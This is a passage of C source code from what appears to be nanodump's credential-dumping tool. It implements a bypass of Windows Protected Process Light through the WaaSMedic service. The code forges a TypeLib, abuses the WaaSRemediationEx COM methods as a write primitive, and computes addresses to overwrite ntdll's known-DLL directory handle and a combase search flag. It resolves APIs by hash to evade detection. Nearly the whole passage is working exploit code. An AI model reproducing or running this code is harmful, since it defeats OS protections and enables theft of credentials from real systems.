    SysFreeString = (SysFreeString_t)(ULONG_PTR)get_function_address(
        get_library_address(OLEAUT32_DLL, TRUE),
        SysFreeString_SW2_HASH,
        0);
    if (!SysFreeString)
    {
        api_not_found("SysFreeString");
        goto cleanup;
    }

    hr = LoadTypeLib(STR_WAASMEDIC_TYPELIB, &TypeLibOrig); // Load the original TypeLib
    if (hr != S_OK)
    {
        function_failed("LoadTypeLib");
        goto cleanup;
    }

    hr = ITypeLib_GetLibAttr(TypeLibOrig, &pTLibAttrOrig);
    if (hr != S_OK)
    {
        function_failed("GetLibAttr");
        goto cleanup;
    }

    hr = CreateTypeLib2(pTLibAttrOrig->syskind, TypeLibPath, &TypeLibNew); // Create a new TypeLib
    if (hr != S_OK)
    {
        function_failed("CreateTypeLib2");
        goto cleanup;
    }

    hr = ICreateTypeLib2_SetGuid(TypeLibNew, &pTLibAttrOrig->guid);
    if (hr != S_OK)
    {
        function_failed("SetGuid");
        goto cleanup;
    }

    hr = ICreateTypeLib2_SetLcid(TypeLibNew, pTLibAttrOrig->lcid);
    if (hr != S_OK)
    {
        function_failed("SetLcid");
        goto cleanup;
    }

    hr = ICreateTypeLib2_SetVersion(TypeLibNew, pTLibAttrOrig->wMajorVerNum, pTLibAttrOrig->wMinorVerNum);
    if (hr != S_OK)
    {
        function_failed("SetVersion");
        goto cleanup;
    }

    //
    // BEGIN: Write the IWaaSRemediationEx interface
    //

    hr = ITypeLib_GetTypeInfoOfGuid(TypeLibOrig, &InterfaceGuid1, &TypeInfoOrig); // Get info about IWaaSRemediationEx interface
    if (hr != S_OK)
    {
        function_failed("GetTypeInfoOfGuid");
        goto cleanup;
    }

    hr = ITypeInfo_GetTypeAttr(TypeInfoOrig, &pTypeAttrOrig); // Get interface content
    if (hr != S_OK)
    {
        function_failed("GetTypeAttr");
        goto cleanup;
    }

    hr = ITypeInfo_GetDocumentation(TypeInfoOrig, MEMBERID_NIL, &TypeLibName, NULL, NULL, NULL); // Get TypeLib name
    if (hr != S_OK)
    {
        function_failed("GetDocumentation");
        goto cleanup;
    }

    hr = ICreateTypeLib2_CreateTypeInfo(TypeLibNew, TypeLibName, TKIND_INTERFACE, &TypeInfoNew); // Type: "dispatch" to "interface"
    if (hr != S_OK)
    {
        function_failed("CreateTypeInfo");
        goto cleanup;
    }

    hr = ICreateTypeInfo_SetTypeFlags(TypeInfoNew, TYPEFLAG_FHIDDEN | TYPEFLAG_FDUAL | TYPEFLAG_FNONEXTENSIBLE | TYPEFLAG_FOLEAUTOMATION);
    if (hr != S_OK)
    {
        function_failed("SetTypeFlags");
        goto cleanup;
    }

    hr = ICreateTypeInfo_SetGuid(TypeInfoNew, &pTypeAttrOrig->guid);
    if (hr != S_OK)
    {
        function_failed("SetGuid");
        goto cleanup;
    }

    hr = ICreateTypeInfo_SetVersion(TypeInfoNew, pTypeAttrOrig->wMajorVerNum, pTypeAttrOrig->wMinorVerNum);
    if (hr != S_OK)
    {
        function_failed("SetVersion");
        goto cleanup;
    }

    // Add references to implemented interfaces
    for (i = 0; i < pTypeAttrOrig->cImplTypes; i++)
    {

        hr = ITypeInfo_GetRefTypeOfImplType(TypeInfoOrig, i, &hRefType);
        if (hr != S_OK)
            continue;

        hr = ITypeInfo_GetRefTypeInfo(TypeInfoOrig, hRefType, &TypeInfoRef);
        if (hr != S_OK)
            continue;

        hr = ICreateTypeInfo_AddRefTypeInfo(TypeInfoNew, TypeInfoRef, &hRefType);
        if (hr != S_OK)
            continue;

        hr = ICreateTypeInfo_AddImplType(TypeInfoNew, i, hRefType);
        if (hr != S_OK)
            continue;

        safe_release((IUnknown**)&TypeInfoRef);
    }

    //
    // Get the description of each function, modify them and add them to the new TypeLib.
    // See https://thrysoee.dk/InsideCOM+/ch09b.htm
    //


    for (i = 0; i < pTypeAttrOrig->cFuncs; i++)
    {
        hr = ITypeInfo_GetFuncDesc(TypeInfoOrig, i, &pFuncDescOrig);
        if (hr != S_OK)
            continue;

        if (pFuncDescOrig->memid != 0x60020000 && pFuncDescOrig->memid != 0x60020001)
        {
            ITypeInfo_ReleaseFuncDesc(TypeInfoOrig, pFuncDescOrig);
            continue;
        }

        hr = ITypeInfo_GetNames(TypeInfoOrig, pFuncDescOrig->memid, Names, sizeof(Names) / sizeof(*Names), &cNames);
        if (hr != S_OK)
        {
            ITypeInfo_ReleaseFuncDesc(TypeInfoOrig, pFuncDescOrig);
            continue;
        }


        if (pFuncDescOrig->memid == 0x60020000)
        {
            // LaunchDetectionOnly

            ldoParams[0].tdesc.vt = VT_BSTR;
            ldoParams[0].paramdesc.wParamFlags = PARAMFLAG_FIN;
            ldoParams[1].tdesc.vt = VT_UI8;
            ldoParams[1].paramdesc.wParamFlags = PARAMFLAG_FIN;

            pFuncDescOrig->lprgelemdescParam = ldoParams;
        }
        else if (pFuncDescOrig->memid == 0x60020001)
        {
            // LaunchRemediationOnly

            lroParams[0].tdesc.vt = VT_BSTR;
            lroParams[0].paramdesc.wParamFlags = PARAMFLAG_FIN;
            lroParams[1].tdesc.vt = VT_BSTR;
            lroParams[1].paramdesc.wParamFlags = PARAMFLAG_FIN;
            lroParams[2].tdesc.vt = VT_UI8;
            lroParams[2].paramdesc.wParamFlags = PARAMFLAG_FIN;

            pFuncDescOrig->lprgelemdescParam = lroParams;
        }

        pFuncDescOrig->cParams += 1;
        Names[pFuncDescOrig->cParams] = SysAllocString(L"unknown");
        cNames += 1;

        pFuncDescOrig->funckind = FUNC_PUREVIRTUAL; // Change function type from "dispatch" to "pure virtual"
        pFuncDescOrig->elemdescFunc.tdesc.vt = VT_HRESULT; // Set return type to HRESULT
        hr = ICreateTypeInfo_AddFuncDesc(TypeInfoNew, 0, pFuncDescOrig); // Add function description to the interface
        if (hr != S_OK)
        {
            function_failed("AddFuncDesc");
            continue;
        }
        hr = ICreateTypeInfo_SetFuncAndParamNames(TypeInfoNew, 0, Names, cNames); // Set function and parameter names
        if (hr != S_OK)
        {
            function_failed("SetFuncAndParamNames");
            continue;
        }

        for (j = 0; j < cNames; j++)
        {
            SysFreeString(Names[j]); // Free the strings returned by "GetNames"
        }

        ITypeInfo_ReleaseFuncDesc(TypeInfoOrig, pFuncDescOrig);
    }

    //
    // END: Write the IWaaSRemediationEx interface
    //
    if (pTypeAttrOrig)
    {
        ITypeInfo_ReleaseTypeAttr(TypeInfoOrig, pTypeAttrOrig);
    }
    safe_release((IUnknown**)&TypeInfoOrig);

    //
    // BEGIN: Write the ITaskHandler interface
    //

    hr = ITypeLib_GetTypeInfoOfGuid(TypeLibOrig, &InterfaceGuid2, &TypeInfoOrig); // Get info about ITaskHandler interface
    if (hr != S_OK)
    {
        function_failed("GetTypeInfoOfGuid");
        goto cleanup;
    }

    hr = ITypeInfo_GetTypeAttr(TypeInfoOrig, &pTypeAttrOrig); // Get interface content
    if (hr != S_OK)
    {
        function_failed("GetTypeAttr");
        goto cleanup;
    }

    hr = ITypeInfo_GetDocumentation(TypeInfoOrig, MEMBERID_NIL, &TypeLibName, NULL, NULL, NULL); // Get TypeLib name
    if (hr != S_OK)
    {
        function_failed("GetDocumentation");
        goto cleanup;
    }

    hr = ICreateTypeLib2_CreateTypeInfo(TypeLibNew, TypeLibName, TKIND_INTERFACE, &TypeInfoNew2); // Type: "dispatch" to "interface"
    if (hr != S_OK)
    {
        function_failed("CreateTypeInfo");
        goto cleanup;
    }

    hr = ICreateTypeInfo_SetTypeFlags(TypeInfoNew2, TYPEFLAG_FHIDDEN | TYPEFLAG_FNONEXTENSIBLE | TYPEFLAG_FOLEAUTOMATION);
    if (hr != S_OK)
    {
        function_failed("SetTypeFlags");
        goto cleanup;
    }

    hr = ICreateTypeInfo_SetGuid(TypeInfoNew2, &pTypeAttrOrig->guid);
    if (hr != S_OK)
    {
        function_failed("SetGuid");
        goto cleanup;
    }

    hr = ICreateTypeInfo_SetVersion(TypeInfoNew2, pTypeAttrOrig->wMajorVerNum, pTypeAttrOrig->wMinorVerNum);
    if (hr != S_OK)
    {
        function_failed("SetVersion");
        goto cleanup;
    }

    // Add references to implemented interfaces
    for (i = 0; i < pTypeAttrOrig->cImplTypes; i++)
    {
        hr = ITypeInfo_GetRefTypeOfImplType(TypeInfoOrig, i, &hRefType);
        if (hr != S_OK)
            continue;

        hr = ITypeInfo_GetRefTypeInfo(TypeInfoOrig, hRefType, &TypeInfoRef);
        if (hr != S_OK)
            continue;

        ICreateTypeInfo_AddRefTypeInfo(TypeInfoNew2, TypeInfoRef, &hRefType);
        ICreateTypeInfo_AddImplType(TypeInfoNew2, i, hRefType);

        safe_release((IUnknown**)&TypeInfoRef);
    }

    for (i = 0; i < pTypeAttrOrig->cFuncs; i++)
    {
        hr = ITypeInfo_GetFuncDesc(TypeInfoOrig, i, &pFuncDescOrig);
        if (hr != S_OK)
            continue;

        hr = ITypeInfo_GetNames(TypeInfoOrig, pFuncDescOrig->memid, Names, sizeof(Names) / sizeof(*Names), &cNames);
        if (hr != S_OK)
        {
            ITypeInfo_ReleaseFuncDesc(TypeInfoOrig, pFuncDescOrig);
            continue;
        }

        hr = ICreateTypeInfo_AddFuncDesc(TypeInfoNew2, 0, pFuncDescOrig); // Add function description to the interface
        if (hr != S_OK)
            continue;

        hr = ICreateTypeInfo_SetFuncAndParamNames(TypeInfoNew2, 0, Names, cNames); // Set function and parameter names
        if (hr != S_OK)
            continue;

        for (j = 0; j < cNames; j++)
        {   
            SysFreeString(Names[j]); // Free the strings returned by "GetNames"
        }

        ITypeInfo_ReleaseFuncDesc(TypeInfoOrig, pFuncDescOrig);
    }

    //
    // END: Write the ITaskHandler interface
    //

    hr = ICreateTypeLib2_SaveAllChanges(TypeLibNew);
    if (hr != S_OK)
    {
        function_failed("SaveAllChanges");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    safe_release((IUnknown**)&TypeInfoRef);
    safe_release((IUnknown**)&TypeInfoNew);
    if (TypeLibName) SysFreeString(TypeLibName);
    if (pTypeAttrOrig)
    {
        ITypeInfo_ReleaseTypeAttr(TypeInfoOrig, pTypeAttrOrig);
    }
    safe_release((IUnknown**)&TypeInfoOrig);
    safe_release((IUnknown**)&TypeLibNew);
    if (pTLibAttrOrig)
    {
        ITypeLib_ReleaseTLibAttr(TypeLibOrig, pTLibAttrOrig);
    }
    safe_release((IUnknown**)&TypeLibOrig);

    if (!ret_val)
        DPRINT_ERR("Failed to write TypeLib to file: %ls", TypeLibPath);

    return ret_val;
}

BOOL restart_waa_s_medic_svc()
{
    BOOL  ret_val = FALSE;
    BOOL  success = FALSE;
    DWORD dwWaaSMedicStatus;

    success = get_service_status_by_name(
        STR_WAASMEDIC_SVC,
        &dwWaaSMedicStatus);
    if (!success)
        goto cleanup;

    if (dwWaaSMedicStatus == SERVICE_RUNNING)
    {
        DPRINT("%ls is running, stopping it...", STR_WAASMEDIC_SVC);
        success = stop_service_by_name(STR_WAASMEDIC_SVC, TRUE);
        if (!success)
           goto cleanup;
    }

    DPRINT("Starting service %ls...", STR_WAASMEDIC_SVC);
    success = start_service_by_name(STR_WAASMEDIC_SVC, TRUE);
    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL find_saa_s_medic_svc_pid(
    IN LPDWORD Pid)
{
    return get_service_process_id(STR_WAASMEDIC_SVC, Pid);
}

BOOL find_waa_s_medic_svc_base_named_objects_handle(
    OUT PHANDLE BaseNamedObjectsHandle)
{
    DWORD        saa_s_medic_svc_pid    = 0;
    BOOL         ret_val                = FALSE;
    BOOL         success                = FALSE;
    PHANDLE_LIST handle_list            = NULL;

    success = find_saa_s_medic_svc_pid(&saa_s_medic_svc_pid);
    if (!success)
        goto cleanup;

    success = find_directory_handles_in_process(
        saa_s_medic_svc_pid,
        0,
        &handle_list);
    if (!success)
        goto cleanup;

    if (handle_list->Count < 1)
    {
        DPRINT_ERR("No handle of type 'Directory' was found in the process with PID %ld.", saa_s_medic_svc_pid);
        goto cleanup;
    }

    if (handle_list->Count > 1)
    {
        DPRINT_ERR("More than one handle of type 'Directory' was found in process with PID %ld.", saa_s_medic_svc_pid);
        goto cleanup;
    }

    *BaseNamedObjectsHandle = handle_list->Handle[0];

    ret_val = TRUE;

cleanup:
    if (!ret_val)
    {
        DPRINT("NTDLL is probably not patched.");
    }

    if (handle_list)
        intFree(handle_list);

    return ret_val;
}


================================================
FILE: Creds-BOF/nanodump/source/ppl/ppl_medic_client.c
================================================
#include "ppl/ppl_medic_client.h"

BOOL initialize_interface(
    PIWaaSRemediationEx* IWaaSRemediationEx)
{
    BOOL    ret_val               = FALSE;
    HRESULT ComResult             = 0;
    CLSID   CLSID_WaaSRemediation = CLSID_WAASREMEDIATION;
    IID     IID_WaaSRemediationEx = IID_WAASREMEDIATIONEX;

    CoInitializeEx_t           CoInitializeEx           = NULL;
    CoCreateInstance_t         CoCreateInstance         = NULL;
    CoEnableCallCancellation_t CoEnableCallCancellation = NULL;

    CoInitializeEx = (CoInitializeEx_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoInitializeEx_SW2_HASH,
        0);
    if (!CoInitializeEx)
    {
        api_not_found("CoInitializeEx");
        goto cleanup;
    }

    CoCreateInstance = (CoCreateInstance_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoCreateInstance_SW2_HASH,
        0);
    if (!CoCreateInstance)
    {
        api_not_found("CoCreateInstance");
        goto cleanup;
    }

    CoEnableCallCancellation = (CoEnableCallCancellation_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoEnableCallCancellation_SW2_HASH,
        0);
    if (!CoEnableCallCancellation)
    {
        api_not_found("CoEnableCallCancellation");
        goto cleanup;
    }

    ComResult = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    if (FAILED(ComResult))
    {
        function_failed("CoInitializeEx");
        goto cleanup;
    }

    ComResult = CoCreateInstance(
        &CLSID_WaaSRemediation,
        NULL,
        CLSCTX_LOCAL_SERVER,
        &IID_WaaSRemediationEx,
        (LPVOID *)IWaaSRemediationEx);
    if (FAILED(ComResult))
    {
        function_failed("CoCreateInstance");
        goto cleanup;
    }

    ComResult = CoEnableCallCancellation(NULL);
    if (FAILED(ComResult))
    {
        function_failed("CoEnableCallCancellation");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL resolve_dispatch_ids(
    IN PIWaaSRemediationEx IWaaSRemediationEx,
    OUT DISPID *DispIdLaunchDetectionOnly,
    OUT DISPID *DispIdLaunchRemediationOnly)
{
    BOOL    ret_val                   = FALSE;
    HRESULT ComResult                 = 0;
    LPWSTR  pwszLaunchDetectionOnly   = STR_METHOD_LAUNCHDETECTIONONLY;
    LPWSTR  pwszLaunchRemediationOnly = STR_METHOD_LAUNCHREMEDIATIONONLY;
    IID     IID_Null                  = IID_ALL_ZERO;

    ComResult = IWaaSRemediationEx_GetIDsOfNames(IWaaSRemediationEx, &IID_Null, &pwszLaunchDetectionOnly, 1, 1033, DispIdLaunchDetectionOnly);
    if (FAILED(ComResult))
    {
        function_failed("GetIDsOfNames");
        goto cleanup;
    }

    ComResult = IWaaSRemediationEx_GetIDsOfNames(IWaaSRemediationEx, &IID_Null, &pwszLaunchRemediationOnly, 1, 1033, DispIdLaunchRemediationOnly);
    if (FAILED(ComResult))
    {
        function_failed("GetIDsOfNames");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    
    if (ret_val)
    {
        DPRINT("LDO ID: 0x%08lx | LRO ID: 0x%08lx", *DispIdLaunchDetectionOnly, *DispIdLaunchRemediationOnly);
    }

    return ret_val;
}

BOOL write_remote_dll_search_path_flag(
    IN PIWaaSRemediationEx IWaaSRemediationEx,
    IN DISPID DispIdLaunchRemediationOnly)
{
    BOOL                                    ret_val                   = FALSE;
    BOOL                                    success                   = FALSE;
    ULONG_PTR                               pDllSearchPathFlagAddress = 0;
    WRITE_REMOTE_DLL_SEARCH_PATH_FLAG_PARAM WriteParams               = { 0 };
    DWORD                                   dwThreadId                = 0;
    DWORD                                   dwThreadExitCode          = 0;
    HANDLE                                  hThread                   = NULL;

    // TODO: syscalls

    SysAllocString_t      SysAllocString      = NULL;
    CoCancelCall_t        CoCancelCall        = NULL;
    CreateThread_t        CreateThread        = NULL;
    WaitForSingleObject_t WaitForSingleObject = NULL;
    GetExitCodeThread_t   GetExitCodeThread   = NULL;

    SysAllocString = (SysAllocString_t)(ULONG_PTR)get_function_address(
        get_library_address(OLEAUT32_DLL, TRUE),
        SysAllocString_SW2_HASH,
        0);
    if (!SysAllocString)
    {
        api_not_found("SysAllocString");
        goto cleanup;
    }

    CoCancelCall = (CoCancelCall_t)(ULONG_PTR)get_function_address(
        get_library_address(OLE32_DLL, TRUE),
        CoCancelCall_SW2_HASH,
        0);
    if (!CoCancelCall)
    {
        api_not_found("CoCancelCall");
        goto cleanup;
    }

    CreateThread = (CreateThread_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        CreateThread_SW2_HASH,
        0);
    if (!CreateThread)
    {
        api_not_found("CreateThread");
        goto cleanup;
    }

    WaitForSingleObject = (WaitForSingleObject_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        WaitForSingleObject_SW2_HASH,
        0);
    if (!WaitForSingleObject)
    {
        api_not_found("WaitForSingleObject");
        goto cleanup;
    }

    GetExitCodeThread = (GetExitCodeThread_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetExitCodeThread_SW2_HASH,
        0);
    if (!GetExitCodeThread)
    {
        api_not_found("GetExitCodeThread");
        goto cleanup;
    }

    success = find_combase_dll_search_flag_address(&pDllSearchPathFlagAddress);
    if (!success)
        goto cleanup;

    memset(&WriteParams, 0, sizeof(WriteParams));
    WriteParams.CallerApplicationName       = SysAllocString(L"");
    WriteParams.Plugins                     = SysAllocString(L"");
    WriteParams.DispIdLaunchRemediationOnly = DispIdLaunchRemediationOnly;
    WriteParams.WaaSRemediationEx           = IWaaSRemediationEx;
    WriteParams.WriteAt                     = pDllSearchPathFlagAddress - 8;

    hThread = CreateThread(NULL, 0, write_remote_dll_search_path_flag_thread, &WriteParams, 0, &dwThreadId);
    if (!hThread)
    {
        function_failed("CreateThread");
        goto cleanup;
    }

    if (WaitForSingleObject(hThread, TIMEOUT) != WAIT_OBJECT_0)
    {
        DPRINT("Thread with ID %ld is taking too long, cancelling...", dwThreadId);
        CoCancelCall(dwThreadId, TIMEOUT);
        goto cleanup;
    }

    success = GetExitCodeThread(hThread, &dwThreadExitCode);
    if (!success)
        goto cleanup;

    if (dwThreadExitCode != ERROR_SUCCESS)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    safe_close_handle(&hThread);

    if (!ret_val)
    {
        DPRINT_ERR("Failed to write DLL search path flag in remote process (thread exit code: 0x%08lx).", dwThreadExitCode);
    }

    return ret_val;
}

HRESULT invoke_launch_remediation_only(
    IN PIWaaSRemediationEx Interface,
    IN DISPID DispId,
    IN BSTR Plugins,
    IN BSTR CallerApplicationName,
    IN ULONG_PTR Result)
{
    DISPPARAMS Params                      = { 0 };
    VARIANT    VarResult                   = { 0 };
    EXCEPINFO  ExcepInfo                   = { 0 };
    UINT       ArgErr                      = 0xffffffff;
    VARIANTARG ArgLaunchRemediationOnly[3] = { 0 };
    IID        IID_Null                    = IID_ALL_ZERO;

    memset(&ArgLaunchRemediationOnly, 0, sizeof(ArgLaunchRemediationOnly));
    ArgLaunchRemediationOnly[0].vt      = VT_UI8;
    ArgLaunchRemediationOnly[0].ullVal  = Result;
    ArgLaunchRemediationOnly[1].vt      = VT_BSTR;
    ArgLaunchRemediationOnly[1].bstrVal = CallerApplicationName;
    ArgLaunchRemediationOnly[2].vt      = VT_BSTR;
    ArgLaunchRemediationOnly[2].bstrVal = Plugins;

    memset(&Params, 0, sizeof(Params));
    Params.cArgs             = sizeof(ArgLaunchRemediationOnly) / sizeof(*ArgLaunchRemediationOnly);
    Params.rgvarg            = ArgLaunchRemediationOnly;
    Params.cNamedArgs        = 0;
    Params.rgdispidNamedArgs = NULL;

    return IWaaSRemediationEx_Invoke(Interface, DispId, &IID_Null, 1033, DISPATCH_METHOD, &Params, &VarResult, &ExcepInfo, &ArgErr);
}

HRESULT invoke_launch_detection_only(
    IN PIWaaSRemediationEx Interface,
    IN DISPID DispId,
    IN BSTR CallerApplicationName,
    IN ULONG_PTR Result)
{
    DISPPARAMS Params                    = { 0 };
    VARIANT    VarResult                 = { 0 };
    EXCEPINFO  ExcepInfo                 = { 0 };
    UINT       ArgErr                    = 0xffffffff;
    VARIANTARG ArgLaunchDetectionOnly[2] = { 0 };
    IID        IID_Null                  = IID_ALL_ZERO;

    memset(&ArgLaunchDetectionOnly, 0, sizeof(ArgLaunchDetectionOnly));
    ArgLaunchDetectionOnly[0].vt = VT_UI8;
    ArgLaunchDetectionOnly[0].ullVal = Result;
    ArgLaunchDetectionOnly[1].vt = VT_BSTR;
    ArgLaunchDetectionOnly[1].bstrVal = CallerApplicationName;

    memset(&Params, 0, sizeof(Params));
    Params.cArgs = sizeof(ArgLaunchDetectionOnly) / sizeof(*ArgLaunchDetectionOnly);
    Params.rgvarg = ArgLaunchDetectionOnly;
    Params.cNamedArgs = 0;
    Params.rgdispidNamedArgs = NULL;

    return IWaaSRemediationEx_Invoke(Interface, DispId, &IID_Null, 1033, DISPATCH_METHOD, &Params, &VarResult, &ExcepInfo, &ArgErr);
}

ULONG32 get_strategy(
    IN ULONG32 TargetValue)
{
    ULONG32 Strategy = 0;

    //
    // If the target handle value is 0x18, 0x38, 0x58 (etc.), we have a higher chance of hitting
    // the right value if we extract the first byte (index 0) of the returned heap address.
    //
    if (TargetValue >= 0x18)
    {
        Strategy = ((TargetValue - 0x18) % 32 == 0) ? EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_0 : EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_1;
    }
    //
    // Otherwise, extract the second byte (index 1) of the returned heap address.
    //
    else
    {
        Strategy = EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_1;
    }

    return Strategy;
}

BOOL calculate_write_addresses(
    IN PVOID BaseAddress,
    IN ULONG32 TargetValue,
    OUT PDWORD64 WriteAtLaunchDetectionOnly,
    OUT PDWORD64 WriteAtLaunchRemediationOnly)
{
    ULONG32 Strategy = 0;
    //
    // _BaseAddress: address of ntdll!LdrpKnownDllDirectoryHandle
    // _WriteAtLaunchDetectionOnly: address used to write the result of LaunchDetectionOnly
    // _WriteAtLaunchRemediationOnly: address used to write the result of LaunchRemediationOnly
    //
    // First strategy: keep value at index 0
    // 
    //   After the call to LaunchDetectionOnly
    //     00007fff`971dc028  00 00 00 00  00 00 00 00    <- (LdrpFatalHardErrorCount)
    //     00007fff`971dc030  HH XX XX XX  XX XX 00 00    <- LdrpKnownDllDirectoryHandle
    //     00007fff`971dc038  00 00 00 00  00 00 00 00    <- NOT USED
    // 
    //   After the call to LaunchRemediationOnly (1)
    //     00007fff`971dc028  00 17 00 00  00 00 00 00    <- (LdrpFatalHardErrorCount)
    //     00007fff`971dc030  HH 00 00 00  00 XX 00 00    <- LdrpKnownDllDirectoryHandle
    //     00007fff`971dc038  00 00 00 00  00 00 00 00    <- NOT USED
    // 
    //      After the call to LaunchRemediationOnly (2)
    //     00007fff`971dc028  00 17 17 00  00 00 00 00    <- (LdrpFatalHardErrorCount)
    //     00007fff`971dc030  HH 00 00 00  00 00 00 00    <- LdrpKnownDllDirectoryHandle
    //     00007fff`971dc038  00 00 00 00  00 00 00 00    <- NOT USED
    // 
    // Second strategy: keep value at index 1
    // 
    //   After the call to LaunchDetectionOnly
    //     00007fff`971dc028  00 00 00 00  00 00 00 XX    <- (LdrpFatalHardErrorCount)
    //     00007fff`971dc030  HH XX XX XX  XX 00 00 00    <- LdrpKnownDllDirectoryHandle
    //     00007fff`971dc038  00 00 00 00  00 00 00 00    <- NOT USED
    //
    //   After the call to LaunchRemediationOnly
    //     00007fff`971dc028  00 17 00 00  00 00 00 XX    <- (LdrpFatalHardErrorCount)
    //     00007fff`971dc030  HH 00 00 00  00 00 00 00    <- LdrpKnownDllDirectoryHandle
    //     00007fff`971dc038  00 00 00 00  00 00 00 00    <- NOT USED
    //

    Strategy = get_strategy(TargetValue);

    if (Strategy == EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_0)
    {
        *WriteAtLaunchDetectionOnly = (DWORD64)(ULONG_PTR)BaseAddress;       // Write value XX XX XX XX XX XX 00 00 @ ntdll!LdrpKnownDllDirectoryHandle
        *WriteAtLaunchRemediationOnly = (DWORD64)(ULONG_PTR)BaseAddress - 7; // Write 00 00 00 00 @ LdrpKnownDllDirectoryHandle+1 (+1 again for the second call)
        return TRUE;
    }
    else if (Strategy == EXPLOIT_STRATEGY_EXTRACT_BYTE_AT_INDEX_1)
    {
        *WriteAtLaunchDetectionOnly = (DWORD64)(ULONG_PTR)BaseAddress - 1;   // Write value XX XX XX XX XX XX 00 00 @ ntdll!LdrpKnownDllDirectoryHandle-1
        *WriteAtLaunchRemediationOnly = (DWORD64)(ULONG_PTR)BaseAddress - 7; // Write 00 00 00 00 @ LdrpKnownDllDirectoryHandle+1
        return TRUE;
    }

    return FALSE;
}

DWORD WINAPI write_remote_dll_search_path_flag_thread(LPVOID Parameter)
{
    PWRITE_REMOTE_DLL_SEARCH_PATH_FLAG_PARAM WriteParams = (PWRITE_REMOTE_DLL_SEARCH_PATH_FLAG_PARAM)Parameter;
    HRESULT hr;

    hr = invoke_launch_remediation_only(
        WriteParams->WaaSRemediationEx,
        WriteParams->DispIdLaunchRemediationOnly,
        WriteParams->Plugins,
        WriteParams->CallerApplicationName,
        WriteParams->WriteAt);

    if (FAILED(hr))
    {
        DPRINT_ERR("LaunchRemediationOnly(0x%p): 0x%08lx", (PVOID)WriteParams->WriteAt, hr);
        return (DWORD)hr;
    }

    return ERROR_SUCCESS;
}

BOOL find_combase_dll_search_flag_address(
    IN PULONG_PTR Address)
{
    BOOL      ret_val                     = FALSE;
    BOOL      success                     = FALSE;
    HMODULE   hCombaseModule              = NULL;
    ULONG_PTR pCombaseTextSection         = 0;
    ULONG_PTR pCombaseDataSection         = 0;
    ULONG_PTR pCombaseDataSectionLimit    = 0;
    ULONG_PTR pPatternAddress             = 0;
    ULONG_PTR pPatternAddress2            = 0;
    DWORD     dwCombaseTextSectionSize    = 0;
    DWORD     dwCombaseDataSectionSize    = 0;
    DWORD     dwPatternOffset             = 0;
    DWORD     i                           = 0;
    BYTE      bPattern[]                  = { 0x01, 0x00, 0x13, 0x00 };
    DWORD     dwRipRelativeOffsetForward  = 0;
    DWORD     dwRipRelativeOffsetBackward = 0;
    ULONG_PTR pCandidateAddressTemp       = 0;
    ULONG_PTR pCandidateAddressForward    = 0;
    ULONG_PTR pCandidateAddressBackward   = 0;

    LoadLibraryW_t LoadLibraryW = NULL;

    *Address = 0;

    LoadLibraryW = (LoadLibraryW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        LoadLibraryW_SW2_HASH,
        0);
    if (!LoadLibraryW)
    {
        api_not_found("LoadLibraryW");
        goto cleanup;
    }

    hCombaseModule = LoadLibraryW(STR_MOD_COMBASE);
    if (!hCombaseModule)
    {
        function_failed("LoadLibraryW");
        goto cleanup;
    }
    success = find_module_section(hCombaseModule, ".text", &pCombaseTextSection, &dwCombaseTextSectionSize);
    if (!success)
        goto cleanup;

    success = find_module_section(hCombaseModule, ".data", &pCombaseDataSection, &dwCombaseDataSectionSize);
    if (!success)
        goto cleanup;

    success = find_module_pattern(bPattern, sizeof(bPattern), pCombaseTextSection, dwCombaseTextSectionSize, &pPatternAddress);
    if (!success)
        goto cleanup;

    //
    // Ensure that the pattern is unique. We search for the pattern once again starting at offset + 1 until
    // we reach the end of the .text section. If we find another occurrence, we should exit safely.
    //

    success = find_module_pattern(bPattern, sizeof(bPattern), pCombaseTextSection + dwPatternOffset + 1, dwCombaseTextSectionSize - dwPatternOffset - 1, &pPatternAddress2);
    if (!success)
        goto cleanup;

    dwPatternOffset = (DWORD)(pPatternAddress - (ULONG_PTR)hCombaseModule);

    //
    // Now that we found the offset of our pattern in the code, we can start searching forward and backward for
    // valid RIP-relative offsets. We consider that a RIP-relative offset is 'valid' when the value corresponding
    // to the sum of RIP and this offset falls within the .data section. We do the search both forward and 
    // backward and compare the obtained values at the end. If the values are not equal, we should exit safely.
    //

    pCombaseDataSectionLimit = pCombaseDataSection + dwCombaseDataSectionSize;

    for (i = 0; i < 32; i++)
    {
        memcpy(&dwRipRelativeOffsetForward, (PVOID)(pPatternAddress + i), sizeof(dwRipRelativeOffsetForward));
        pCandidateAddressTemp = pPatternAddress + i + sizeof(dwRipRelativeOffsetForward) + dwRipRelativeOffsetForward;
        if (pCandidateAddressTemp >= pCombaseDataSection && pCandidateAddressTemp < pCombaseDataSectionLimit)
        {
            pCandidateAddressForward = pCandidateAddressTemp;
            DPRINT("Found forward candidate:  0x%p", (PVOID)pCandidateAddressForward);
        }

        memcpy(&dwRipRelativeOffsetBackward, (PVOID)(pPatternAddress - sizeof(bPattern) - i), sizeof(dwRipRelativeOffsetBackward));
        pCandidateAddressTemp = pPatternAddress - sizeof(bPattern) - i + sizeof(dwRipRelativeOffsetBackward) + dwRipRelativeOffsetBackward;
        if (pCandidateAddressTemp >= pCombaseDataSection && pCandidateAddressTemp < pCombaseDataSectionLimit)
        {
            pCandidateAddressBackward = pCandidateAddressTemp;
            DPRINT("Found backward candidate: 0x%p", (PVOID)pCandidateAddressBackward);
        }
    }

    if (!pCandidateAddressForward || !pCandidateAddressBackward)
        goto cleanup;
